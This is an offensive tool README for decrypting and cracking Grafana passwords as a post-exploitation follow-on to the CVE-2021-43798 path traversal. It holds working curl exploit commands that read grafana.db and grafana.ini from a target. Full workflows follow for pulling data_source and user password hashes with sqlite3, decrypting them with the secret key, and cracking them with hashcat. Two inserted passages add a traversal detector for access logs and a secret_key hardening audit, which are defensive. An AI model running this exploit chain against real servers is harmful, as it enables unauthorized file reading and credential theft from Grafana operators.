Python toolkit for decrypting and cracking Grafana passwords from multiple formats.
Coded by: strikoder
Handles two types of Grafana password storage:
- 🔐 AES-256 Base64 (data_source table) → Decrypt directly with AESDecrypt.py
- 🔨 PBKDF2_HMAC_SHA256 (user table) → Convert for Hashcat with grafana2hashcat.py
Perfect for post-exploitation after CVE-2021-43798 path traversal.
A path traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0 that allows unauthenticated attackers to read arbitrary files from the server, including:
- Configuration files (`/etc/grafana/grafana.ini`)
- Database files (`/var/lib/grafana/grafana.db`)
- System files (`/etc/passwd`)

Example exploit:

```bash
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is --output grafana.db
```

This toolkit completes the attack chain by decrypting/cracking the passwords you extract from the database.
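From a detection standpoint, the traversal requests shown above leave a recognisable trace in web-server or reverse-proxy access logs. The following script is an added example written for this page, not code from the Grafana-Password-Decryptor toolkit or from Grafana: it parses combined-format access log lines (constructed samples, assumed to come from a reverse proxy in front of Grafana), URL-decodes the request path, and flags any `/public/plugins/<plugin>/...` request whose normalised path escapes the plugin directory, while leaving `..` segments that stay inside the directory alone.

```python
"""
Detect CVE-2021-43798-style plugin-asset traversal in access logs.
Added educational example; not part of the Grafana-Password-Decryptor toolkit.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (IPs and timestamps are made up).
SAMPLE_LOGS = [
    '10.0.0.5 - - [07/Dec/2021:10:01:02 +0000] "GET /public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 1048576',
    '10.0.0.5 - - [07/Dec/2021:10:01:03 +0000] "GET /public/plugins/zipkin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 4096',
    '10.0.0.9 - - [07/Dec/2021:10:02:00 +0000] "GET /public/plugins/zipkin/module.js HTTP/1.1" 200 2048',
    '10.0.0.9 - - [07/Dec/2021:10:02:01 +0000] "GET /api/dashboards/home HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
PLUGIN_PREFIX = "/public/plugins/"


def traversal_target(raw_path: str):
    """Return the normalised path a plugin-asset request resolves to when it
    escapes its plugin directory, or None when the request stays inside it.
    The path is decoded twice to catch single- and double-URL-encoded dots."""
    path = unquote(unquote(raw_path.split("?", 1)[0]))
    if not path.startswith(PLUGIN_PREFIX):
        return None
    rest = path[len(PLUGIN_PREFIX):]
    if "/" not in rest:
        return None
    plugin, asset = rest.split("/", 1)
    # Assets are served relative to the plugin directory; a normalised path
    # that no longer lies under that directory indicates traversal.
    resolved = posixpath.normpath(PLUGIN_PREFIX + plugin + "/" + asset)
    if resolved.startswith(PLUGIN_PREFIX + plugin + "/"):
        return None
    return resolved


def scan_log(lines):
    """Return (client_ip, resolved_target) for every request that escapes its plugin directory."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = traversal_target(match.group("path"))
        if target is not None:
            hits.append((line.split(" ", 1)[0], target))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOGS):
        print(f"traversal from {ip}: resolved to {target}")
```

Matching on the literal string `..` alone would also fire on harmless relative asset references such as `img/../module.js`; normalising the path and checking whether it still sits under the plugin directory avoids that false positive and also catches the encoded variants.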
Decrypts AES-256 encrypted passwords from the data_source table.
Based on: jas502n/Grafana-CVE-2021-43798 with key improvements:
- ✅ Flexible Secret Key: Extract key manually (no hardcoded paths)
- ✅ Batch Processing: Decrypt multiple hashes from a file
- ✅ Fully Configurable: All parameters via CLI flags
Converts Grafana PBKDF2_HMAC_SHA256 hashes from the user table to Hashcat-compatible format for password cracking.
Credit: iamaldi/grafana2hashcat
```bash
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography  # for decryption
chmod +x AESDecrypt.py grafana2hashcat.py
```

Decrypt a single hash or a file of hashes:

```bash
python3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
python3 AESDecrypt.py -f hashes.txt
```

Extract the secret key from Grafana config:

```bash
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key
python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEY
```

Convert user-table hashes:

```bash
python3 grafana2hashcat.py grafana_hashes.txt
```

Input format (grafana_hashes.txt):

```
hash1,salt1
hash2,salt2
hash3,salt3
```

Output (ready for Hashcat):

```
sha256:10000:base64_salt:base64_hash
```
```bash
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt
hashcat -m 10900 hashcat_hashes.txt wordlist.txt
```

Full workflow for data_source passwords:

```bash
# 1. Extract secret key from grafana.ini (might be empty in some cases; use the default key in the Python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
  --path-as-is | grep secret_key
# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db
# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"
# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]
```

Full workflow for user-table hashes:

```bash
# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
  --path-as-is -o grafana.db
# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"
# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper
# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt
# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt
```

| Password Type | Database Table | Format | Tool | Hashcat Mode |
|---|---|---|---|---|
| AES-256 Encrypted | data_source | Base64 string | AESDecrypt.py | N/A (direct decrypt) |
| PBKDF2_HMAC_SHA256 | user | Hex hash + salt | grafana2hashcat.py | -m 10900 |
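The secret_key step in the workflow above doubles as a hardening check on the defender's side: a Grafana instance whose `[security] secret_key` is missing, empty, or still the shipped default protects its data_source passwords with a key anyone can look up, which is exactly why the README suggests falling back to the default key. The following audit function is an added example for this page, not part of the toolkit or of Grafana: it parses grafana.ini text with Python's configparser and reports those conditions. The default key value is taken from Grafana's defaults.ini and the 32-character minimum is a policy choice; both are assumptions to verify against your installed version, and the sample ini fragments are constructed.

```python
"""
Audit a grafana.ini for weak [security] secret_key settings.
Added educational example; not part of the Grafana-Password-Decryptor toolkit.
"""
import configparser

# Grafana's shipped default from defaults.ini (assumed; verify against your version).
KNOWN_DEFAULT_KEYS = {"SW2YcwTIb9zpOOhoPsMm"}
MIN_KEY_LENGTH = 32  # assumed local policy threshold, not a Grafana requirement

# Constructed sample configurations.
WEAK_INI = """
[server]
http_port = 3000

[security]
admin_user = admin
secret_key = SW2YcwTIb9zpOOhoPsMm
"""

HARDENED_INI = """
[security]
admin_user = admin
secret_key = k7P2vQx9LmR4sT8wY1zB6nC3dF5gH0jJuV7aE2iO9qWl
"""


def audit_secret_key(ini_text: str):
    """Return a list of findings about [security] secret_key in grafana.ini text."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(ini_text)
    except configparser.MissingSectionHeaderError:
        # grafana.ini may carry top-level keys (e.g. app_mode) before the first section.
        parser.read_string("[global]\n" + ini_text)

    findings = []
    if not parser.has_option("security", "secret_key"):
        findings.append("secret_key not set: Grafana uses the built-in default")
        return findings

    key = parser.get("security", "secret_key").strip()
    if key == "":
        # An empty override is ignored, so the built-in default remains in effect.
        findings.append("secret_key is empty: Grafana uses the built-in default")
    elif key in KNOWN_DEFAULT_KEYS:
        findings.append("secret_key is the shipped default: data_source passwords decrypt with a public key")
    elif len(key) < MIN_KEY_LENGTH:
        findings.append(f"secret_key is only {len(key)} characters long")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit_secret_key(text) or ["no findings"])
```

Because changing secret_key invalidates everything already encrypted under the old one, the check is most useful before an instance goes live or as part of a rotation plan that re-encrypts the data_source table afterwards.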
- AESDecrypt.py: Coded by strikoder, based on jas502n's Go implementation
- grafana2hashcat.py: Created by iamaldi
⭐ Found this useful? Give it a star!
Coded by strikoder